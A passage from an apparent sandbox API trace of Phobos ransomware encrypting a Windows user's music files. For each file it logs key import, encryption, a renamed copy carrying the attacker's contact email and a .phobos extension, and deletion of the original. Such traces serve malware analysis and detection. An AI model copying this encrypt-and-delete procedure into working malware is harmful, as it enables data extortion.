h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\vqfSimOlRiKKnw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\vqfsimolrikknw.m4a")) returned 1 [0198.564] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\ZgE5jZV_URQp-KKTf\\g ICL.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\zge5jzv_urqp-kktf\\g icl.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.565] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=89130) returned 1 [0198.565] CloseHandle (hObject=0x15c) returned 1 [0198.565] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\ZgE5jZV_URQp-KKTf\\g ICL.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\zge5jzv_urqp-kktf\\g icl.m4a")) returned 0x20 [0198.566] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\ZgE5jZV_URQp-KKTf\\g ICL.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\zge5jzv_urqp-kktf\\g icl.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.566] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\ZgE5jZV_URQp-KKTf\\g ICL.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\zge5jzv_urqp-kktf\\g icl.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.566] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.566] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.566] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\ZgE5jZV_URQp-KKTf\\g ICL.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\zge5jzv_urqp-kktf\\g icl.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0198.566] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0198.566] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.566] ReadFile (in: hFile=0x15c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x15c2a, lpOverlapped=0x0) returned 1 [0198.568] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x15c30, dwBufLen=0x15c30 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x15c30) returned 1 [0198.568] WriteFile (in: hFile=0x118, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x15c30, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x15c30, lpOverlapped=0x0) returned 1 [0198.570] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32aa8) returned 1 [0198.570] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.570] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0198.570] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0198.570] WriteFile (in: hFile=0x118, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0198.570] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.570] CloseHandle (hObject=0x15c) returned 1 [0198.570] CloseHandle (hObject=0x118) returned 1 [0198.570] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\ZgE5jZV_URQp-KKTf\\g ICL.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\zge5jzv_urqp-kktf\\g icl.m4a")) returned 1 [0198.572] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.572] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\ZgE5jZV_URQp-KKTf\\nSzgsiWIwkr9jAOkmWu.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\zge5jzv_urqp-kktf\\nszgsiwiwkr9jaokmwu.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0198.655] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=27525) returned 1 [0198.655] CloseHandle (hObject=0x16c) returned 1 [0198.655] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\ZgE5jZV_URQp-KKTf\\nSzgsiWIwkr9jAOkmWu.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\zge5jzv_urqp-kktf\\nszgsiwiwkr9jaokmwu.wav")) returned 0x20 [0198.655] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\ZgE5jZV_URQp-KKTf\\nSzgsiWIwkr9jAOkmWu.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\zge5jzv_urqp-kktf\\nszgsiwiwkr9jaokmwu.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\ZgE5jZV_URQp-KKTf\\nSzgsiWIwkr9jAOkmWu.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\zge5jzv_urqp-kktf\\nszgsiwiwkr9jaokmwu.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0198.656] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.656] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.656] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\ZgE5jZV_URQp-KKTf\\nSzgsiWIwkr9jAOkmWu.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\zge5jzv_urqp-kktf\\nszgsiwiwkr9jaokmwu.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0198.656] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32b68) returned 1 [0198.656] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.656] ReadFile (in: hFile=0x16c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x6b85, lpOverlapped=0x0) returned 1 [0198.664] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x6b90, dwBufLen=0x6b90 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x6b90) returned 1 [0198.665] WriteFile (in: hFile=0x118, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x6b90, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x6b90, lpOverlapped=0x0) returned 1 [0198.666] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0198.666] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.666] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0198.666] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.666] WriteFile (in: hFile=0x118, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0198.666] CryptDestroyKey (hKey=0xa32b68) returned 1 [0198.666] CloseHandle (hObject=0x16c) returned 1 [0198.666] CloseHandle (hObject=0x118) returned 1 [0198.666] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\ZgE5jZV_URQp-KKTf\\nSzgsiWIwkr9jAOkmWu.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\zge5jzv_urqp-kktf\\nszgsiwiwkr9jaokmwu.wav")) returned 1 [0198.668] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\V7ey\\O693BtnnsXnoxsN.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\v7ey\\o693btnnsxnoxsn.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0198.707] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=6521) returned 1 [0198.707] CloseHandle (hObject=0x16c) returned 1 [0198.707] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\V7ey\\O693BtnnsXnoxsN.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\v7ey\\o693btnnsxnoxsn.mp3")) returned 0x20 [0198.707] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\V7ey\\O693BtnnsXnoxsN.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\v7ey\\o693btnnsxnoxsn.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.707] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\V7ey\\O693BtnnsXnoxsN.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\v7ey\\o693btnnsxnoxsn.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0198.708] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.708] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.708] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\V7ey\\O693BtnnsXnoxsN.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\v7ey\\o693btnnsxnoxsn.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.708] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32b68) returned 1 [0198.708] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.709] ReadFile (in: hFile=0x16c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1979, lpOverlapped=0x0) returned 1 [0198.710] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1980, dwBufLen=0x1980 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1980) returned 1 [0198.710] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1980, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1980, lpOverlapped=0x0) returned 1 [0198.710] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0198.711] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.711] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0198.711] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.711] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0198.711] CryptDestroyKey (hKey=0xa32b68) returned 1 [0198.711] CloseHandle (hObject=0x16c) returned 1 [0198.711] CloseHandle (hObject=0x140) returned 1 [0198.711] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\V7ey\\O693BtnnsXnoxsN.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\v7ey\\o693btnnsxnoxsn.mp3")) returned 1 [0198.714] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.714] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\WlLl-_9g.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wlll-_9g.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.715] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=82474) returned 1 [0198.715] CloseHandle (hObject=0x140) returned 1 [0198.715] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\WlLl-_9g.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wlll-_9g.m4a")) returned 0x20 [0198.715] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\WlLl-_9g.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wlll-_9g.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\WlLl-_9g.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wlll-_9g.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.716] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.716] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.716] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\WlLl-_9g.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wlll-_9g.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0198.716] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32b68) returned 1 [0198.716] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.716] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1422a, lpOverlapped=0x0) returned 1 [0198.718] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x14230, dwBufLen=0x14230 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x14230) returned 1 [0198.718] WriteFile (in: hFile=0x16c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x14230, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x14230, lpOverlapped=0x0) returned 1 [0198.722] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0198.722] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.722] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0198.722] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.722] WriteFile (in: hFile=0x16c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0198.722] CryptDestroyKey (hKey=0xa32b68) returned 1 [0198.722] CloseHandle (hObject=0x140) returned 1 [0198.722] CloseHandle (hObject=0x16c) returned 1 [0198.722] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\WlLl-_9g.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wlll-_9g.m4a")) returned 1 [0198.723] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.723] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xLBOGNNUMVLleJAV6e.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xlbognnumvllejav6e.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0198.724] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=12652) returned 1 [0198.724] CloseHandle (hObject=0x16c) returned 1 [0198.724] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xLBOGNNUMVLleJAV6e.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xlbognnumvllejav6e.m4a")) returned 0x20 [0198.724] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xLBOGNNUMVLleJAV6e.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xlbognnumvllejav6e.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.724] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xLBOGNNUMVLleJAV6e.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xlbognnumvllejav6e.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0198.724] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.724] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.724] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xLBOGNNUMVLleJAV6e.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xlbognnumvllejav6e.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.725] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32b68) returned 1 [0198.725] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.725] ReadFile (in: hFile=0x16c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x316c, lpOverlapped=0x0) returned 1 [0198.727] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3170, dwBufLen=0x3170 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3170) returned 1 [0198.727] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3170, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3170, lpOverlapped=0x0) returned 1 [0198.728] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0198.728] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.728] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0198.728] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.728] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, 